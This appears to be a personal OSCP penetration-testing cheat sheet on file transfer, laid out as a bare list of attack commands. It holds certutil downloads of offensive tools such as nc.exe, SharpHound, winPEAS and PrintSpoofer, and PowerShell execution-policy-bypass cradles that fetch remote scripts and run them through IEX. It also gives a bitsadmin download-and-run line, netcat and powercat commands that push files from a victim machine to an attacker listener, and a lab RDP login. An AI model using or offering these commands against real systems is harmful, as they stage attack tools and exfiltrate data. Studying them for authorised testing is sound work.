2-http-server and file transfer - My-oscp-all-things

``` axel target.com/file -o file wget target.com/file -O file curl target.com/file -o file ``` ## transfer file first ``` certutil -urlcache -split -f http://127.0.0.1:8000/powerview_new.ps1 certutil -urlcache -split -f http://127.0.0.1:8000/nc.exe certutil -urlcache -split -f http://127.0.0.1:8000/getacl.ps1 certutil -urlcache -split -f http://127.0.0.1:8000/winPEASany.exe certutil -urlcache -split -f http://127.0.0.1:8000/SharpHound.exe certutil -urlcache -split -f http://127.0.0.1:8000/beRoot.exe certutil -urlcache -split -f http://127.0.0.1:8000/PowerUp.ps1 certutil -urlcache -split -f http://127.0.0.1:8000/Seatbelt.exe certutil -urlcache -split -f http://127.0.0.1:8000/SharpUp.exe certutil -urlcache -split -f http://127.0.0.1:8000/PrintSpoofer.exe ``` ## transfer file two ``` GetCLSID.ps1 Rubeus.exe ``` ## powershell https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 ```bash powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe' ！！！！！可能需要用下面的 String cmd = "(New-object Net.WebClient).DownloadFile('http://192.168.49.57/shell.exe','c:/public/a.exe');start-process 'c:/public/a.exe'"; powershell.exe -ep bypass -c "iex (iwr 10.10.14.9:8000/ipw.ps1 -UseBasicParsing)" powershell.exe -Exec ByPass -NoProfile -c "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.189/3389_64.ps1') | IEX" // 这个终于可以执行了需要psh 不是ps1 powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.187/3389.ps1')" powershell.exe -Exec ByPass -c "(New-Object System.Net.WebClient).DownloadString('http://172.16.194.6/run.ps1') | IEX" powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest "https://gist.githubusercontent.com/ChrisKibble/afea9880a184cd2b2445e5d8408715af/raw/41cbbf042af07136132f09395e4664ffab33e310/gistfile1.txt").Content).Invoke();" ``` ## bisadmin ``` bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe ``` ## ftp server ``` python3 -m pyftpdlib -p 21 -w ``` ## remote desktop ``` xfreerdp /u:jamie /p:rangers /v:172.31.1.18 remmia //linux ``` ## smb server ``` impacker-smbserver ShareName SharePath //server way1 //client copy \\IP\ShareName\file.exe file.exe way 2 net use x: //ip/servername/ cd x:\ del net use x: /delete use : copy \\10.10.17.83\temp\1.exe c:\Users\tolis\Desktop\1.exe 直接调用也是这么用的。\\ ``` ``` ## lab machine to attack machine ``` lab machine powercat.ps1 -c ip -p port -i "file" nc attackip atkport < file attack machine nc -lvvp port > file ``` ## ftp code ```python from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.handlers import FTPHandler from pyftpdlib.servers import FTPServer # The port the FTP server will listen on. # This must be greater than 1023 unless you run this script as root. FTP_PORT = 2121 # The name of the FTP user that can log in. FTP_USER = "myuser" # The FTP user's password. FTP_PASSWORD = "change_this_password" # The directory the FTP user will have full read/write access to. FTP_DIRECTORY = "/srv/users/SYSUSER/apps/APPNAME/public/" def main(): authorizer = DummyAuthorizer() # Define a new user having full r/w permissions. authorizer.add_user(FTP_USER, FTP_PASSWORD, FTP_DIRECTORY, perm='elradfmw') handler = FTPHandler handler.authorizer = authorizer # Define a customized banner (string returned when client connects) handler.banner = "pyftpdlib based ftpd ready." # Optionally specify range of ports to use for passive connections. #handler.passive_ports = range(60000, 65535) address = ('', FTP_PORT) server = FTPServer(address, handler) server.max_cons = 256 server.max_cons_per_ip = 5 server.serve_forever() if __name__ == '__main__': main() ``` ## reverse_shell [[3-reverse_shell]]